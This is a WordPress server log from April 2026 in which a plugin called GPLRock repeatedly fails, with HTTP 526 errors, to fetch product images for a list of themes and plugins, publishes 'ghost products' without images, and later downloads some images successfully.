WITHOUT image - Product ID: micare-medical-and-health-care-wordpress-theme [06-Apr-2026 18:13:11 UTC] GPLRock: Image download failed for product bluebell-hotel-resort-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:13:13 UTC] GPLRock: Image download failed for product bluebell-hotel-resort-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:13:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bluebell---hotel--resort-wordpress-theme-2556.webp for product bluebell-hotel-resort-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:13:16 UTC] GPLRock: Image download failed for product bluebell-hotel-resort-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:13:18 UTC] GPLRock: Image download failed for product bluebell-hotel-resort-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:13:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bluebell---hotel--resort-wordpress-theme-2556.webp for product bluebell-hotel-resort-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:13:20 UTC] GPLRock WARNING: Image download failed for product bluebell-hotel-resort-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/bluebell---hotel--resort-wordpress-theme-2556.webp [06-Apr-2026 18:13:20 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: bluebell-hotel-resort-wordpress-theme [06-Apr-2026 18:13:20 UTC] GPLRock: Image download failed for product doctype-a-flat-and-minimal-portfolio-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:13:22 UTC] GPLRock: Image download failed for product doctype-a-flat-and-minimal-portfolio-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:13:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/doctype---a-flat-and-minimal-portfolio-theme-29056.webp for product doctype-a-flat-and-minimal-portfolio-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:13:24 UTC] GPLRock: Image download failed for product doctype-a-flat-and-minimal-portfolio-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:13:26 UTC] GPLRock: Image download failed for product doctype-a-flat-and-minimal-portfolio-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:13:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/doctype---a-flat-and-minimal-portfolio-theme-29056.webp for product doctype-a-flat-and-minimal-portfolio-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:13:28 UTC] GPLRock WARNING: Image download failed for product doctype-a-flat-and-minimal-portfolio-theme. URL: https://meldwp.com/wp-content/uploads/doctype---a-flat-and-minimal-portfolio-theme-29056.webp [06-Apr-2026 18:13:28 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: doctype-a-flat-and-minimal-portfolio-theme [06-Apr-2026 18:13:29 UTC] GPLRock: Image download failed for product photo-nexus-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:13:31 UTC] GPLRock: Image download failed for product photo-nexus-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:13:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/photo-nexus--wordpress-theme-18969.webp for product photo-nexus-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:13:33 UTC] GPLRock: Image download failed for product photo-nexus-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:13:35 UTC] GPLRock: Image download failed for product photo-nexus-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:13:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/photo-nexus--wordpress-theme-18969.webp for product photo-nexus-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:13:37 UTC] GPLRock WARNING: Image download failed for product photo-nexus-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/photo-nexus--wordpress-theme-18969.webp [06-Apr-2026 18:13:37 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: photo-nexus-wordpress-theme [06-Apr-2026 18:13:37 UTC] GPLRock: Image download failed for product benton-digital-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:13:39 UTC] GPLRock: Image download failed for product benton-digital-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:13:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/benton---digital-agency-wordpress-theme-12983.webp for product benton-digital-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:13:42 UTC] GPLRock: Image download failed for product benton-digital-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:13:44 UTC] GPLRock: Image download failed for product benton-digital-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:13:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/benton---digital-agency-wordpress-theme-12983.webp for product benton-digital-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:13:46 UTC] GPLRock WARNING: Image download failed for product benton-digital-agency-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/benton---digital-agency-wordpress-theme-12983.webp [06-Apr-2026 18:13:46 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: benton-digital-agency-wordpress-theme [06-Apr-2026 18:13:46 UTC] GPLRock: Image download failed for product veera-multipurpose-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:13:48 UTC] GPLRock: Image download failed for product veera-multipurpose-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:13:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/veera--multipurpose-woocommerce-theme-18102.webp for product veera-multipurpose-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:13:50 UTC] GPLRock: Image download failed for product veera-multipurpose-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:13:52 UTC] GPLRock: Image download failed for product veera-multipurpose-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:13:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/veera--multipurpose-woocommerce-theme-18102.webp for product veera-multipurpose-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:13:54 UTC] GPLRock WARNING: Image download failed for product veera-multipurpose-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/veera--multipurpose-woocommerce-theme-18102.webp [06-Apr-2026 18:13:54 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: veera-multipurpose-woocommerce-theme [06-Apr-2026 18:13:55 UTC] GPLRock: Image download failed for product obsius-creative-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:13:57 UTC] GPLRock: Image download failed for product obsius-creative-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:13:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/obsius---creative-agency-wordpress-theme-8914.webp for product obsius-creative-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:13:59 UTC] GPLRock: Image download failed for product obsius-creative-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:14:01 UTC] GPLRock: Image download failed for product obsius-creative-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:14:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/obsius---creative-agency-wordpress-theme-8914.webp for product obsius-creative-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:14:03 UTC] GPLRock WARNING: Image download failed for product obsius-creative-agency-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/obsius---creative-agency-wordpress-theme-8914.webp [06-Apr-2026 18:14:03 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: obsius-creative-agency-wordpress-theme [06-Apr-2026 18:14:03 UTC] GPLRock: Image download failed for product digixon-digital-marketing-strategy-wp-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:14:05 UTC] GPLRock: Image download failed for product digixon-digital-marketing-strategy-wp-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:14:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/digixon---digital-marketing-strategy-wp-theme-23949.webp for product digixon-digital-marketing-strategy-wp-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:14:08 UTC] GPLRock: Image download failed for product digixon-digital-marketing-strategy-wp-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:14:10 UTC] GPLRock: Image download failed for product digixon-digital-marketing-strategy-wp-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:14:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/digixon---digital-marketing-strategy-wp-theme-23949.webp for product digixon-digital-marketing-strategy-wp-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:14:12 UTC] GPLRock WARNING: Image download failed for product digixon-digital-marketing-strategy-wp-theme. URL: https://meldwp.com/wp-content/uploads/digixon---digital-marketing-strategy-wp-theme-23949.webp [06-Apr-2026 18:14:12 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: digixon-digital-marketing-strategy-wp-theme [06-Apr-2026 18:14:30 UTC] GPLRock: Image download failed for product pdf-viewer-addon-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:14:33 UTC] GPLRock: Image download failed for product pdf-viewer-addon-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:14:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/pdf-viewer---addon-for-elementor-24197.webp for product pdf-viewer-addon-for-elementor after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:14:35 UTC] GPLRock: Image download failed for product pdf-viewer-addon-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:14:37 UTC] GPLRock: Image download failed for product pdf-viewer-addon-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:14:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/pdf-viewer---addon-for-elementor-24197.webp for product pdf-viewer-addon-for-elementor after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:14:39 UTC] GPLRock WARNING: Image download failed for product pdf-viewer-addon-for-elementor. URL: https://meldwp.com/wp-content/uploads/pdf-viewer---addon-for-elementor-24197.webp [06-Apr-2026 18:14:39 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: pdf-viewer-addon-for-elementor [06-Apr-2026 18:14:39 UTC] GPLRock: Image download failed for product quickbooksintuit-payment-api-gateway-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:14:41 UTC] GPLRock: Image download failed for product quickbooksintuit-payment-api-gateway-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:14:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/quickbooksintuit-payment-api-gateway-for-woocommerce-5458.webp for product quickbooksintuit-payment-api-gateway-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:14:43 UTC] GPLRock: Image download failed for product quickbooksintuit-payment-api-gateway-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:14:45 UTC] GPLRock: Image download failed for product quickbooksintuit-payment-api-gateway-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:14:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/quickbooksintuit-payment-api-gateway-for-woocommerce-5458.webp for product quickbooksintuit-payment-api-gateway-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:14:48 UTC] GPLRock WARNING: Image download failed for product quickbooksintuit-payment-api-gateway-for-woocommerce. URL: https://meldwp.com/wp-content/uploads/quickbooksintuit-payment-api-gateway-for-woocommerce-5458.webp [06-Apr-2026 18:14:48 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: quickbooksintuit-payment-api-gateway-for-woocommerce [06-Apr-2026 18:14:48 UTC] GPLRock: Image download failed for product woocommerce-cybersource-payment-gateway (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:14:50 UTC] GPLRock: Image download failed for product woocommerce-cybersource-payment-gateway (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:14:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-cybersource-payment-gateway-32573.webp for product woocommerce-cybersource-payment-gateway after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:14:52 UTC] GPLRock: Image download failed for product woocommerce-cybersource-payment-gateway (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:14:54 UTC] GPLRock: Image download failed for product woocommerce-cybersource-payment-gateway (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:14:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-cybersource-payment-gateway-32573.webp for product woocommerce-cybersource-payment-gateway after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:14:56 UTC] GPLRock WARNING: Image download failed for product woocommerce-cybersource-payment-gateway. URL: https://meldwp.com/wp-content/uploads/woocommerce-cybersource-payment-gateway-32573.webp [06-Apr-2026 18:14:56 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-cybersource-payment-gateway [06-Apr-2026 18:14:56 UTC] GPLRock: Image download failed for product whatsapp-chat-wordpress-whatsapp-chat (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:14:58 UTC] GPLRock: Image download failed for product whatsapp-chat-wordpress-whatsapp-chat (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:15:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/whatsapp-chat---wordpress-whatsapp-chat-32815.webp for product whatsapp-chat-wordpress-whatsapp-chat after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:15:01 UTC] GPLRock: Image download failed for product whatsapp-chat-wordpress-whatsapp-chat (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:15:03 UTC] GPLRock: Image download failed for product whatsapp-chat-wordpress-whatsapp-chat (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:15:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/whatsapp-chat---wordpress-whatsapp-chat-32815.webp for product whatsapp-chat-wordpress-whatsapp-chat after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:15:05 UTC] GPLRock WARNING: Image download failed for product whatsapp-chat-wordpress-whatsapp-chat. URL: https://meldwp.com/wp-content/uploads/whatsapp-chat---wordpress-whatsapp-chat-32815.webp [06-Apr-2026 18:15:05 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: whatsapp-chat-wordpress-whatsapp-chat [06-Apr-2026 18:15:05 UTC] GPLRock: Image download failed for product wordpress-support-using-whatsapp (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:15:07 UTC] GPLRock: Image download failed for product wordpress-support-using-whatsapp (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:15:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wordpress-support-using-whatsapp-15286.webp for product wordpress-support-using-whatsapp after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:15:09 UTC] GPLRock: Image download failed for product wordpress-support-using-whatsapp (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:15:11 UTC] GPLRock: Image download failed for product wordpress-support-using-whatsapp (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:15:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wordpress-support-using-whatsapp-15286.webp for product wordpress-support-using-whatsapp after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:15:13 UTC] GPLRock WARNING: Image download failed for product wordpress-support-using-whatsapp. URL: https://meldwp.com/wp-content/uploads/wordpress-support-using-whatsapp-15286.webp [06-Apr-2026 18:15:13 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wordpress-support-using-whatsapp [06-Apr-2026 18:15:14 UTC] GPLRock: Image download failed for product wp-mail-settings-missing-wordpress-settings (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:15:16 UTC] GPLRock: Image download failed for product wp-mail-settings-missing-wordpress-settings (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:15:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wp-mail-settings---missing-wordpress-settings-29422.webp for product wp-mail-settings-missing-wordpress-settings after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:15:18 UTC] GPLRock: Image download failed for product wp-mail-settings-missing-wordpress-settings (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:15:20 UTC] GPLRock: Image download failed for product wp-mail-settings-missing-wordpress-settings (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:15:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wp-mail-settings---missing-wordpress-settings-29422.webp for product wp-mail-settings-missing-wordpress-settings after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:15:22 UTC] GPLRock WARNING: Image download failed for product wp-mail-settings-missing-wordpress-settings. URL: https://meldwp.com/wp-content/uploads/wp-mail-settings---missing-wordpress-settings-29422.webp [06-Apr-2026 18:15:22 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wp-mail-settings-missing-wordpress-settings [06-Apr-2026 18:15:22 UTC] GPLRock: Image download failed for product device-scroll-image-for-wpbakery-page-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:15:24 UTC] GPLRock: Image download failed for product device-scroll-image-for-wpbakery-page-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:15:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/device-scroll-image-for-wpbakery-page-builder-32057.webp for product device-scroll-image-for-wpbakery-page-builder after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:15:27 UTC] GPLRock: Image download failed for product device-scroll-image-for-wpbakery-page-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:15:29 UTC] GPLRock: Image download failed for product device-scroll-image-for-wpbakery-page-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:15:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/device-scroll-image-for-wpbakery-page-builder-32057.webp for product device-scroll-image-for-wpbakery-page-builder after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:15:31 UTC] GPLRock WARNING: Image download failed for product device-scroll-image-for-wpbakery-page-builder. URL: https://meldwp.com/wp-content/uploads/device-scroll-image-for-wpbakery-page-builder-32057.webp [06-Apr-2026 18:15:31 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: device-scroll-image-for-wpbakery-page-builder [06-Apr-2026 18:15:31 UTC] GPLRock: Image download failed for product blog-post-image-accordion-addon-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:15:33 UTC] GPLRock: Image download failed for product blog-post-image-accordion-addon-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:15:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/blog-post-image-accordion-addon-for-elementor-14716.webp for product blog-post-image-accordion-addon-for-elementor after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:15:35 UTC] GPLRock: Image download failed for product blog-post-image-accordion-addon-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:15:37 UTC] GPLRock: Image download failed for product blog-post-image-accordion-addon-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:15:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/blog-post-image-accordion-addon-for-elementor-14716.webp for product blog-post-image-accordion-addon-for-elementor after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:15:39 UTC] GPLRock WARNING: Image download failed for product blog-post-image-accordion-addon-for-elementor. URL: https://meldwp.com/wp-content/uploads/blog-post-image-accordion-addon-for-elementor-14716.webp [06-Apr-2026 18:15:39 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: blog-post-image-accordion-addon-for-elementor [06-Apr-2026 18:15:40 UTC] GPLRock: Image download failed for product multi-vendor-coupon-marketplace-plugin-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:15:42 UTC] GPLRock: Image download failed for product multi-vendor-coupon-marketplace-plugin-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:15:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/multi-vendor-coupon-marketplace-plugin-for-woocommerce-23595.webp for product multi-vendor-coupon-marketplace-plugin-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:15:44 UTC] GPLRock: Image download failed for product multi-vendor-coupon-marketplace-plugin-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:15:46 UTC] GPLRock: Image download failed for product multi-vendor-coupon-marketplace-plugin-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:15:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/multi-vendor-coupon-marketplace-plugin-for-woocommerce-23595.webp for product multi-vendor-coupon-marketplace-plugin-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:15:48 UTC] GPLRock WARNING: Image download failed for product multi-vendor-coupon-marketplace-plugin-for-woocommerce. URL: https://meldwp.com/wp-content/uploads/multi-vendor-coupon-marketplace-plugin-for-woocommerce-23595.webp [06-Apr-2026 18:15:48 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: multi-vendor-coupon-marketplace-plugin-for-woocommerce [06-Apr-2026 18:15:48 UTC] GPLRock: Image download failed for product zapp-proxy-server-plugin-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:15:50 UTC] GPLRock: Image download failed for product zapp-proxy-server-plugin-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:15:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/zapp-proxy-server-plugin-for-wordpress-16748.webp for product zapp-proxy-server-plugin-for-wordpress after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:15:53 UTC] GPLRock: Image download failed for product zapp-proxy-server-plugin-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:15:55 UTC] GPLRock: Image download failed for product zapp-proxy-server-plugin-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:15:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/zapp-proxy-server-plugin-for-wordpress-16748.webp for product zapp-proxy-server-plugin-for-wordpress after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:15:57 UTC] GPLRock WARNING: Image download failed for product zapp-proxy-server-plugin-for-wordpress. URL: https://meldwp.com/wp-content/uploads/zapp-proxy-server-plugin-for-wordpress-16748.webp [06-Apr-2026 18:15:57 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: zapp-proxy-server-plugin-for-wordpress [06-Apr-2026 18:16:16 UTC] GPLRock: Image downloaded successfully for product advanced-custom-fields-flexible-content-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-bcede034.jpg [06-Apr-2026 18:16:16 UTC] GPLRock: Using pre-downloaded image for product advanced-custom-fields-flexible-content-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-bcede034.jpg [06-Apr-2026 18:16:16 UTC] GPLRock: Ghost product published with image - Product ID: advanced-custom-fields-flexible-content-addon [06-Apr-2026 18:16:18 UTC] GPLRock: Image downloaded successfully for product facetwp-conditional-logic (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4d0b173f.jpg [06-Apr-2026 18:16:18 UTC] GPLRock: Using pre-downloaded image for product facetwp-conditional-logic: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4d0b173f.jpg [06-Apr-2026 18:16:18 UTC] GPLRock: Ghost product published with image - Product ID: facetwp-conditional-logic [06-Apr-2026 18:16:19 UTC] GPLRock: Image downloaded successfully for product master-slider-touch-layer-slider-wordpress-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e9ccf598.jpg [06-Apr-2026 18:16:19 UTC] GPLRock: Using pre-downloaded image for product master-slider-touch-layer-slider-wordpress-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e9ccf598.jpg [06-Apr-2026 18:16:19 UTC] GPLRock: Ghost product published with image - Product ID: master-slider-touch-layer-slider-wordpress-plugin [06-Apr-2026 18:16:21 UTC] GPLRock: Image downloaded successfully for product formidable-forms-user-registration (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-24626b00.jpg [06-Apr-2026 18:16:21 UTC] GPLRock: Using pre-downloaded image for product formidable-forms-user-registration: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-24626b00.jpg [06-Apr-2026 18:16:21 UTC] GPLRock: Ghost product published with image - Product ID: formidable-forms-user-registration [06-Apr-2026 18:16:23 UTC] GPLRock: Image downloaded successfully for product easy-digital-downloads-email-reports (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-21040b23.jpg [06-Apr-2026 18:16:23 UTC] GPLRock: Using pre-downloaded image for product easy-digital-downloads-email-reports: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-21040b23.jpg [06-Apr-2026 18:16:23 UTC] GPLRock: Ghost product published with image - Product ID: easy-digital-downloads-email-reports [06-Apr-2026 18:16:24 UTC] GPLRock: Image downloaded successfully for product ultimate-member-google-recaptcha-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d4f7ecd9.jpg [06-Apr-2026 18:16:24 UTC] GPLRock: Using pre-downloaded image for product ultimate-member-google-recaptcha-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d4f7ecd9.jpg [06-Apr-2026 18:16:24 UTC] GPLRock: Ghost product published with image - Product ID: ultimate-member-google-recaptcha-addon [06-Apr-2026 18:16:26 UTC] GPLRock: Image downloaded successfully for product formcraft-premium-wordpress-form-builder (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a96fd656.jpg [06-Apr-2026 18:16:26 UTC] GPLRock: Using pre-downloaded image for product formcraft-premium-wordpress-form-builder: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a96fd656.jpg [06-Apr-2026 18:16:26 UTC] GPLRock: Ghost product published with image - Product ID: formcraft-premium-wordpress-form-builder [06-Apr-2026 18:16:28 UTC] GPLRock: Image downloaded successfully for product stockie-multi-purpose-creative-woocommerce-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1240ee8b.jpg [06-Apr-2026 18:16:28 UTC] GPLRock: Using pre-downloaded image for product stockie-multi-purpose-creative-woocommerce-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1240ee8b.jpg [06-Apr-2026 18:16:28 UTC] GPLRock: Ghost product published with image - Product ID: stockie-multi-purpose-creative-woocommerce-theme [06-Apr-2026 18:16:29 UTC] GPLRock: Image downloaded successfully for product facetwp-time-since (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-11a49d45.jpg [06-Apr-2026 18:16:29 UTC] GPLRock: Using pre-downloaded image for product facetwp-time-since: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-11a49d45.jpg [06-Apr-2026 18:16:29 UTC] GPLRock: Ghost product published with image - Product ID: facetwp-time-since [06-Apr-2026 18:16:31 